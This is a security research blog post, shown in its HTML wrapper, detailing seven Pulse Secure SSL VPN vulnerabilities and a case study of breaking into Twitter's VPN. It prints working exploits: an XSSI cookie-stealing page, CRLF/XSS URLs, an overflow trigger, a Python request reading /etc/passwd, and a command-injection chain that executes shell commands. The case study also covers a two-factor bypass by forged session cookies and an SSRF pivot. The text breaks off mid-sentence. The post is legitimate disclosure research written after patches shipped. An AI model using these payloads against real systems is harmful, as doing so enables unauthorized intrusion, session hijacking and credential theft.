<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_) Hi, this is the last part of Attacking SSL VPN series. If you haven’t read previous articles yet, here are the quick links for you:    Infi">
<meta property="og:type" content="article">
<meta property="og:title" content="Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!">
<meta property="og:url" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/index.html">
<meta property="og:site_name" content="Orange Tsai">
<meta property="og:description" content="Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_) Hi, this is the last part of Attacking SSL VPN series. If you haven’t read previous articles yet, here are the quick links for you:    Infi">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/96945a638e4d2cbf-01.png">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/cb977e3504a4b3ac-02.png">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/bcdabc1124cb1566-03.png">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/3194694217ce87e9-04.png">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/5a5d46ac1acccf0d-05.png">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/0c6877cf8cf48bb5-06.png">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/ada05c909f7d4443-07.png">
<meta property="og:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/b6c43ba1094b2d2e-08.png">
<meta property="article:published_time" content="2019-09-01T16:00:00.000Z">
<meta property="article:modified_time" content="2024-08-21T06:09:44.706Z">
<meta property="article:author" content="Orange Tsai">
<meta property="article:tag" content="Hacker, Security, Vulnerability, Web, RCE, SSRF, XSS, CVE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://blog.orange.tw/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/96945a638e4d2cbf-01.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    
      <title>Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study! | Orange Tsai</title>
    
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-13047966-1"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'UA-13047966-1');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="Orange Tsai" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
    <div class="content index py4 ">
        
          <header id="header">
  <a class="u-url u-uid" href="/">
  
    
      <img id="logo" alt class="u-logo" src="/images/logo.png" />
    
  
    <div id="title">
      <h1 class="p-name">Orange Tsai</h1>
    </div>
  </a>
  <div id="nav">
    <ul>
      <li class="icon">
        <a href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-2x"></i></a>
      </li>
      <!--
     --><li><a href="/">Home</a></li><!--
   --><!--
     --><li><a href="/articles/">Articles</a></li><!--
   --><!--
     --><li><a href="/talks/">Talks</a></li><!--
   --><!--
     --><li><a href="/about/">About</a></li><!--
   -->
    </ul>
  </div>
</header>

        

        
          <hr style='margin: 0px; margin-bottom: 32px; border: 0.5px solid #ccc; '>
        

        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">🍊 <a href='/about'>Orange Tsai</a></span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-09-01T16:00:00.000Z" class="dt-published" itemprop="datePublished">2019-09-02</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/96945a638e4d2cbf-01.png" alt="preview">   </p>
<p><em>Author: Orange Tsai(<a target="_blank" rel="noopener" href="https://twitter.com/orange_8361">@orange_8361</a>) and Meh Chang(<a target="_blank" rel="noopener" href="https://twitter.com/mehqq_">@mehqq_</a>)</em></p>
<p>Hi, this is the last part of Attacking SSL VPN series. If you haven’t read previous articles yet, here are the quick links for you:  </p>
<ul>
<li><a target="_blank" rel="noopener" href="https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf">Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs</a></li>
<li><a href="https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html">Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!</a></li>
<li><a href="https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html">Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN</a></li>
</ul>
<p>After we published our research at Black Hat, due to its great severity and huge impacts, it got lots of attention and discussions. Many people desire first-hand news and wonder when the exploit(especially the Pulse Secure preAuth one) will be released.  </p>
<p>We also discussed this internally. Actually, we could simply drop the whole exploits without any concern and acquire plenty of media exposures. However, as a SECURITY firm, our responsibility is to make the world more secure. So we decided to postpone the public disclosure to give the world more time to apply the patches!  </p>
<p>Unfortunately, the exploits were revealed by someone else. They can be easily found on GitHub<sup><a target="_blank" rel="noopener" href="https://github.com/milo2012/CVE-2018-13379">[1]</a> <a target="_blank" rel="noopener" href="https://github.com/milo2012/CVE-2018-13382">[2]</a> <a target="_blank" rel="noopener" href="https://github.com/projectzeroindia/CVE-2019-11510">[3]</a></sup> and exploit-db<sup><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/47297">[1]</a></sup>. Honestly, we couldn’t say they are wrong, because the bugs are absolutely fixed several months ago, and they spent their time differing&#x2F;reversing&#x2F;reproducing. But it’s indeed a worth discussing question to the security community: if you have a nuclear level weapon, when is it ready for public disclosure?  </p>
<p>We heard about more than 25 bug bounty programs are exploited. From the statistics of <a target="_blank" rel="noopener" href="https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/">Bad Packet</a>, numerous Fortune 500, U.S. military, governments, financial institutions and universities are also affected by this. There are even <a target="_blank" rel="noopener" href="https://twitter.com/sherlocksecure/status/1164492373591642112">10 NASA servers exposed for this bug</a>. So, these premature public disclosures indeed force these entities to upgrade their SSL VPN, this is the good part.  </p>
<p>On the other hand, the bad part is that there is an increasing number of <a target="_blank" rel="noopener" href="https://www.securityweek.com/hackers-target-vulnerabilities-fortinet-pulse-secure-products">botnets</a> scanning the Internet in the meanwhile. An <a target="_blank" rel="noopener" href="https://twitter.com/GossiTheDog/status/1167170305577689091">intelligence</a> also points out that there is already a China APT group exploiting this bug. This is such an Internet disaster. Apparently, the world is not ready yet. So, if you haven’t updated your Palo Alto, Fortinet or Pulse Secure SSL VPN, please update it ASAP!  </p>
<h1 id="About-Pulse-Secure"><a href="#About-Pulse-Secure" class="headerlink" title="About Pulse Secure"></a>About Pulse Secure</h1><p>Pulse Secure is the market leader of SSL VPN which provides professional secure access solutions for Hybrid IT. Pulse Secure has been in our research queue for a long time because it was a <a target="_blank" rel="noopener" href="https://archive.li/8pzwf">critical infrastructure of Google</a>, which is one of our long-term targets. However, Google applies the Zero Trust security model, and therefore the VPN is removed now.  </p>
<p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/cb977e3504a4b3ac-02.png"></p>
<p>We started to review Pulse Secure in mid-December last year. In the first 2 months, we got nothing. Pulse Secure has a good coding style and security awareness so that it’s hard to find trivial bugs. Here is an interesting comparison, we found the arbitrary file reading <a target="_blank" rel="noopener" href="https://fortiguard.com/psirt/FG-IR-18-384">CVE-2018-13379</a> on FortiGate SSL VPN on our first research day…  </p>
<p>Pulse Secure is also a Perl lover, and writes lots of Perl extensions in C++. The interaction between Perl and C++ is also confusing to us, but we got more familiar with it while we paid more time digging in it. Finally, we got the first blood on <strong>March 8, 2019</strong>! It’s a stack-based overflow on the management interface! Although this bug isn’t that useful, our research progress got on track since that, and we uncovered more and more bugs.  </p>
<p>We reported all of our finding to Pulse Secure PSIRT on <strong>March 22, 2019</strong>. Their response is very quick and they take these vulnerabilities seriously! After several conference calls with Pulse Secure, <strong>they fixed all bugs just within a month</strong>, and released the patches on <strong>April 24, 2019</strong>. You can check the detailed <a target="_blank" rel="noopener" href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/">security advisory</a>!  </p>
<p>It’s a great time to work with Pulse Secure. From our perspective, Pulse Secure is the most responsible vendor among all SSL VPN vendors we have reported bugs to!  </p>
<h1 id="Vulnerabilities"><a href="#Vulnerabilities" class="headerlink" title="Vulnerabilities"></a>Vulnerabilities</h1><p>We have found 7 vulnerabilities in total. Here is the list. We will introduce each one but focus on the CVE-2019-11510 and CVE-2019-11539 more.  </p>
<ul>
<li>CVE-2019-11510 - Pre-auth Arbitrary File Reading</li>
<li>CVE-2019-11542 - Post-auth(admin) Stack Buffer Overflow</li>
<li>CVE-2019-11539 - Post-auth(admin) Command Injection</li>
<li>CVE-2019-11538 - Post-auth(user) Arbitrary File Reading via NFS</li>
<li>CVE-2019-11508 - Post-auth(user) Arbitrary File Writing via NFS</li>
<li>CVE-2019-11540 - Post-auth Cross-Site Script Inclusion</li>
<li>CVE-2019-11507 - Post-auth Cross-Site Scripting</li>
</ul>
<p>And here are affected versions:</p>
<ul>
<li>Pulse Connect Secure 9.0R1 - 9.0R3.3</li>
<li>Pulse Connect Secure 8.3R1 - 8.3R7</li>
<li>Pulse Connect Secure 8.2R1 - 8.2R12</li>
<li>Pulse Connect Secure 8.1R1 - 8.1R15</li>
<li>Pulse Policy Secure 9.0R1 - 9.0R3.3</li>
<li>Pulse Policy Secure 5.4R1 - 5.4R7</li>
<li>Pulse Policy Secure 5.3R1 - 5.3R12</li>
<li>Pulse Policy Secure 5.2R1 - 5.2R12</li>
<li>Pulse Policy Secure 5.1R1 - 5.1R15</li>
</ul>
<h2 id="CVE-2019-11540-Cross-Site-Script-Inclusion"><a href="#CVE-2019-11540-Cross-Site-Script-Inclusion" class="headerlink" title="CVE-2019-11540: Cross-Site Script Inclusion"></a>CVE-2019-11540: Cross-Site Script Inclusion</h2><p>The script <code>/dana/cs/cs.cgi</code> renders the session ID in JavaScript. As the content-type is set to <code>application/x-javascript</code>, we could perform the XSSI attack to steal the DSID cookie!  </p>
<p>Even worse, the CSRF protection in Pulse Secure SSL VPN is based on the DSID. With this XSSI, we can bypass all the CSRF protection!  </p>
<p>PoC:  </p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- http://attacker/malicious.html --&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;https://sslvpn/dana/cs/cs.cgi?action=appletobj&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">window</span>.<span class="property">onload</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">window</span>.<span class="property">document</span>.<span class="property">writeln</span> = <span class="keyword">function</span> (<span class="params">msg</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (msg.<span class="title function_">indexOf</span>(<span class="string">&quot;DSID&quot;</span>) &gt;= <span class="number">0</span>) <span class="title function_">alert</span>(msg)</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="title class_">ReplaceContent</span>()</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="CVE-2019-11507-Cross-Site-Scripting"><a href="#CVE-2019-11507-Cross-Site-Scripting" class="headerlink" title="CVE-2019-11507: Cross-Site Scripting"></a>CVE-2019-11507: Cross-Site Scripting</h2><p>There is a CRLF Injection in <code>/dana/home/cts_get_ica.cgi</code>. Due to the injection, we can forge arbitrary HTTP headers and inject malicious HTML contents.  </p>
<p>PoC:  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">https://sslvpn/dana/home/cts_get_ica.cgi</span><br><span class="line">?bm_id=x</span><br><span class="line">&amp;vdi=1</span><br><span class="line">&amp;appname=aa%0d%0aContent-Type::text/html%0d%0aContent-Disposition::inline%0d%0aaa:bb&lt;svg/onload=alert(document.domain)&gt;</span><br></pre></td></tr></table></figure>

<h2 id="CVE-2019-11538-Post-auth-user-Arbitrary-File-Reading-via-NFS"><a href="#CVE-2019-11538-Post-auth-user-Arbitrary-File-Reading-via-NFS" class="headerlink" title="CVE-2019-11538: Post-auth(user) Arbitrary File Reading via NFS"></a>CVE-2019-11538: Post-auth(user) Arbitrary File Reading via NFS</h2><p>The following two vulnerabilities (CVE-2019-11538 and CVE-2019-11508) do not affect default configurations. It appears only if the admin configures the NFS sharing for the VPN users.  </p>
<p>If an attacker can control any files on remote NFS server, he can just create a symbolic link to any file, such as <code>/etc/passwd</code>, and read it from web interface. The root cause is that the implementation of NFS mounts the remote server as a real Linux directory, and the script <code>/dana/fb/nfs/nfb.cgi</code> does not check whether the accessed file is a symlink or not!  </p>
<h2 id="CVE-2019-11508-Post-auth-user-Arbitrary-File-Writing-via-NFS"><a href="#CVE-2019-11508-Post-auth-user-Arbitrary-File-Writing-via-NFS" class="headerlink" title="CVE-2019-11508: Post-auth(user) Arbitrary File Writing via NFS"></a>CVE-2019-11508: Post-auth(user) Arbitrary File Writing via NFS</h2><p>This one is a little bit similar to the previous one, but with a different attack vector!  </p>
<p>When the attacker uploads a ZIP file to the NFS through the web interface, the script <code>/dana/fb/nfs/nu.cgi</code> does not sanitize the filename in the ZIP. Therefore, an attacker can build a malicious ZIP file and traverse the path with <code>../</code> in the filename! Once Pulse Secure decompresses, the attacker can upload whatever he wants to whatever path!  </p>
<h2 id="CVE-2019-11542-Post-auth-admin-Stack-Buffer-Overflow"><a href="#CVE-2019-11542-Post-auth-admin-Stack-Buffer-Overflow" class="headerlink" title="CVE-2019-11542: Post-auth(admin) Stack Buffer Overflow"></a>CVE-2019-11542: Post-auth(admin) Stack Buffer Overflow</h2><p>There is a stack-based buffer overflow in the following Perl module implementations:  </p>
<ul>
<li>DSHC::ConsiderForReporting</li>
<li>DSHC::isSendReasonStringEnabled</li>
<li>DSHC::getRemedCustomInstructions</li>
</ul>
<p>These implementations use <code>sprintf</code> to concatenate strings without any length check, which leads to the buffer overflow. The bug can be triggered in many places, but here we use <code>/dana-admin/auth/hc.cgi</code> as our PoC.  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https://sslvpn/dana-admin/auth/hc.cgi</span><br><span class="line">?platform=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span><br><span class="line">&amp;policyid=0</span><br></pre></td></tr></table></figure>

<p>And you can observed the segment fault from <code>dmesg</code>  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cgi-server[22950]: segfault at 61616161 ip 0000000002a80afd sp 00000000ff9a4d50 error 4 in DSHC.so[2a2f000+87000]</span><br></pre></td></tr></table></figure>

<h2 id="CVE-2019-11510-Pre-auth-Arbitrary-File-Reading"><a href="#CVE-2019-11510-Pre-auth-Arbitrary-File-Reading" class="headerlink" title="CVE-2019-11510: Pre-auth Arbitrary File Reading"></a>CVE-2019-11510: Pre-auth Arbitrary File Reading</h2><p>Actually, this is the most severe bug in this time. It is in the web server implementation. As our slides mentioned, Pulse Secure implements their own web server and architecture stack from scratch. The original path validation is very strict. However, since version 8.2, Pulse Secure introduced a new feature called <code>HTML5 Access</code>, it’s a feature used to interact with Telnet, SSH, and RDP by browsers. Thanks to this new feature, the original path validation becomes loose.  </p>
<p>In order to handle the static resources, Pulse Secure created a new IF-CONDITION to widen the originally strict path validation. The code wrongly uses the <code>request-&gt;uri</code> and <code>request-&gt;filepath</code>, so that we can specify the <code>/dana/html5acc/guacamole/</code> in the end of the query string to bypass the validation and make <code>request-&gt;filepath</code> to any file you want to download!  </p>
<p>And it’s worth to mention that in order to read arbitrary files, you must to specify the <code>/dana/html5acc/guacamole/</code> in the middle of the path again. Otherwise, you can only download limited file extensions such as .json, .xml or .html.  </p>
<p>Due to the exploit is in the wild, there is no longer any concern to show the payload:  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">r = requests.get(<span class="string">&#x27;https://sslvpn/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span> r.content</span><br></pre></td></tr></table></figure>

<p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/bcdabc1124cb1566-03.png"></p>
<h2 id="CVE-2019-11539-Post-auth-admin-Command-Injection"><a href="#CVE-2019-11539-Post-auth-admin-Command-Injection" class="headerlink" title="CVE-2019-11539: Post-auth(admin) Command Injection"></a>CVE-2019-11539: Post-auth(admin) Command Injection</h2><p>The last one is a command injection on the management interface. We found this vulnerability very early, but could not find a way to exploit it at first. While we were in Vegas, one of my friends told me that he found the same bug before, but he didn’t find a way to exploit it, so he didn’t report to the vendor.  </p>
<p>However, we did it, and we exploit it in a very smart way :)  </p>
<p>The root cause of this vulnerability is very simple. Here is a code fragment of <code>/dana-admin/diag/diag.cgi</code>:  </p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># ...</span></span><br><span class="line"><span class="variable">$options</span> = tcpdump_options_syntax_check(CGI::param(<span class="string">&quot;options&quot;</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment"># ...</span></span><br><span class="line"><span class="function"><span class="keyword">sub</span> <span class="title">tcpdump_options_syntax_check</span> </span>&#123;</span><br><span class="line">  <span class="keyword">my</span> <span class="variable">$options</span> = <span class="keyword">shift</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="variable">$options</span> <span class="keyword">if</span> <span class="keyword">system</span>(<span class="string">&quot;<span class="variable">$TCPDUMP_COMMAND</span> -d <span class="variable">$options</span> &gt;/dev/null 2&gt;&amp;1&quot;</span>) == <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="keyword">undef</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>It’s so obvious and straightforward that everyone can point out there is a command injection at the parameter <code>options</code>! However, is it that easy? No!  </p>
<p>In order to avoid potential vulnerabilities, Pulse Secure applies lots of hardenings on their products! Such as the system integrity check, read-only filesystem and a module to hook all dangerous Perl invocations like <code>system</code>, <code>open</code> and <code>backtick</code>…  </p>
<p>This module is called <code>DSSAFE.pm</code>. It implements its own command line parser and re-implements the I&#x2F;O redirections in Perl. Here is the <a target="_blank" rel="noopener" href="https://gist.github.com/orangetw/d8df11b147629bb320e7db903c7e7147">code fragments on Gist</a>.  </p>
<p>From the code fragments, you can see it replaces the original <code>system</code> and do lots of checks in <code>__parsecmd</code>. It also blocks numerous bad characters such as:  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[\&amp;\*\(\)\&#123;\&#125;\[\]\`\;\|\?\n~&lt;&gt;]</span><br></pre></td></tr></table></figure>

<p>The checks are very strict so that we can not perform any command injection. We imagined several ways to bypass that, and the first thing came out of my mind is the argument injection. We listed all arguments that <code>TCPDUMP</code> supports and found that the <code>-z postrotate-command</code> may be useful. But the sad thing is that the <code>TCPDUMP</code> in Pulse Secure is too old(v3.9.4, Sept 2005) to support this juicy feature, so we failed :(  </p>
<p>While examining the system, we found that although the webroot is read-only, we can still abuse the cache mechanism. Pulse Secure caches the template result in <code>/data/runtime/tmp/tt/</code> to speed up script rendering. So our next attempt is to write a file into the template cache directory via <code>-w write-file</code> argument. However, it seems impossible to write a polyglot file in both PCAP and Perl format.  </p>
<p>As it seems we had reached the end of argument injection, we tried to dig deeper into the <code>DSSFAFE.pm</code> implementation to see if there is anything we can leverage. Here we found a defect in the command line parser. If we insert an incomplete I&#x2F;O redirection, the rest of the redirection part will be truncated. Although this is a tiny flaw, it helped us to re-control the I&#x2F;O redirections! However, the problem that we can’t generate a valid Perl script still bothered us.  </p>
<p>We got stuck here, and it’s time to think out of the box. It’s hard to generate a valid Perl script via <code>STDOUT</code>, could we just write the Perl by <code>STDERR</code>? The answer is yes. When we force the <code>TCPDUMP</code> to read a nonexistent-file via <code>-r read-file</code>. It shows the error:  </p>
<blockquote>
<p>tcpdump: [filename]: No such file or directory</p>
</blockquote>
<p>It seems we can “<strong>partially</strong>“ control the error message. Then we tried the filename <code>print 123#</code>, and the magic happens!  </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">tcpdump -d -r <span class="string">&#x27;print 123#&#x27;</span></span></span><br><span class="line">  tcpdump: print 123#: No such file or directory</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">tcpdump -d -r <span class="string">&#x27;print 123#&#x27;</span> 2&gt;&amp;1 | perl –</span></span><br><span class="line">  123</span><br></pre></td></tr></table></figure>

<p>The error message becomes a valid Perl script now. Why? OK, let’s have a Perl 101 lesson now!  </p>
<p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/3194694217ce87e9-04.png"></p>
<p>As you can see, Perl supports the GOTO label, so the <code>tcpdump:</code> becomes a valid label in Perl. Then, we comment the rest with a hashtag. With this creative trick, we can generate any valid Perl now!  </p>
<p>Finally, we use an incomplete I&#x2F;O symbol <code>&lt;</code> to fool the <code>DSSAFE.pm</code> command parser and redirect the <code>STDERR</code> into the cache directory! Here is the final exploit:  </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">-r$</span><span class="language-bash">x=<span class="string">&quot;ls /&quot;</span>,system<span class="variable">$x</span># 2&gt;/data/runtime/tmp/tt/setcookie.thtml.ttc &lt;</span> </span><br></pre></td></tr></table></figure>

<p>The concatenated command looks like:  </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/usr/sbin/tcpdump -d </span><br><span class="line"> -r&#x27;$x=&quot;ls /&quot;,system$x#&#x27;</span><br><span class="line"><span class="meta prompt_"> 2&gt;</span><span class="language-bash">/data/runtime/tmp/tt/setcookie.thtml.ttc &lt;</span> </span><br><span class="line"><span class="meta prompt_"> &gt;</span><span class="language-bash">/dev/null</span></span><br><span class="line"><span class="meta prompt_"> 2&gt;</span><span class="language-bash">&amp;1</span></span><br></pre></td></tr></table></figure>

<p>And the generated <code>setcookie.thtml.ttc</code> looks like:  </p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcpdump: <span class="variable">$x</span>=<span class="string">&quot;ls /&quot;</span>,<span class="keyword">system</span><span class="variable">$x</span><span class="comment">#: No such file or directory</span></span><br></pre></td></tr></table></figure>

<p>Once we have done this, we can just fetch the corresponding page to execute our command:  </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">curl https://sslvpn/dana-na/auth/setcookie.cgi</span></span><br><span class="line"> boot  bin  home  lib64       mnt      opt  proc  sys  usr  var</span><br><span class="line"> data  etc  lib   lost+found  modules  pkg  sbin  tmp </span><br><span class="line"> ...</span><br></pre></td></tr></table></figure>

<p>So far, the whole technical part of this command injection is over. However, we think there may be another creative way to exploit this, if you found one, please tell me!  </p>
<h1 id="The-Case-Study"><a href="#The-Case-Study" class="headerlink" title="The Case Study"></a>The Case Study</h1><p>After Pulse Secure patched all the bugs on <strong>April 24, 2019</strong>. We kept monitoring the Internet to measure the response time of each large corporation. Twitter is one of them. They are known for their <a target="_blank" rel="noopener" href="http://hackerone.com/twitter">bug bounty program</a> and nice to hackers. However, it’s improper to exploit a 1-day right after the patch released. So we wait 30 days for Twitter to upgrade their SSL VPN.  </p>
<p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/5a5d46ac1acccf0d-05.png"></p>
<p>We have to say, we were nervous during that time. The first thing we did every morning is to check whether Twitter upgrades their SSL VPN or not! It was an unforgettable time for us :P  </p>
<p>We started to hack Twitter on <strong>May 28, 2019</strong>. During this operation, we encounter several obstacles. The first one is, although we can obtain the plaintext password of Twitter staffs, we still can’t log into their SSL VPN because of the Two Factor Authentication. Here we suggest two ways to bypass that. The first one is that we observed Twitter uses the solution from <a target="_blank" rel="noopener" href="https://duo.com/">Duo</a>. The <a target="_blank" rel="noopener" href="https://duo.com/docs/pulseconnect">manual</a> mentions:  </p>
<blockquote>
<p>The security of your Duo application is tied to the security of your secret key (skey). Secure it as you would any sensitive credential. Don’t share it with unauthorized individuals or email it to anyone under any circumstances!</p>
</blockquote>
<p>So if we can extract the secret key from the system, we can leverage the Duo API to bypass the 2FA. However, we found a quicker way to bypass it. Twitter enabled the <a target="_blank" rel="noopener" href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB30329">Roaming Session</a> feature, which is used to enhances mobility and allows a session from multiple IP locations.  </p>
<p>Due to this “<strong>convenient</strong>“ feature, we can just download the session database and forge our cookies to log into their system!  </p>
<p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/0c6877cf8cf48bb5-06.png"></p>
<p>Until now, we are able to access Twitter Intranet. Nevertheless, our goal is to achieve code execution! It sounds more critical than just accessing the Intranet. So we would like to chain our command injection bug(CVE-2019-11539) together. OK, here, we encountered another obstacle. It’s the restricted management interface!  </p>
<p>As we mentioned before, our bug is on the management interface. But for the security consideration, most of the corporation disable this interface on public, so we need another way to access the admin page. If you have read our previous article carefully, you may recall the “<strong>WebVPN</strong>“ feature! WebVPN is a proxy which helps to connect to anywhere. So, let’s connect to itself.  </p>
<p>Yes, it’s SSRF!  Here we use a small trick to bypass the SSRF protections.  </p>
<p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/ada05c909f7d4443-07.png"></p>
<p>Ahha! Through our SSRF, we can touch the interface now! Then, the last obstacle popped up. We didn’t have any plaintext password of managers. When Perl wants to exchange data with native procedures, such as the Perl extension in C++ or web server, it uses the cache to store data. The problem is, Pulse Secure forgets to clear the sensitive data after exchange, so that’s why we can obtain plaintext passwords in the cache. But practically, most of the managers only log into their system for the first time, so it’s hard to get the manager’s plaintext password. The only thing we got, is the password hash in <code>sha256(md5_crypt(salt, …))</code> format…  </p>
<p>If you are experienced in cracking hashes, you will know how hard it is. So…  </p>
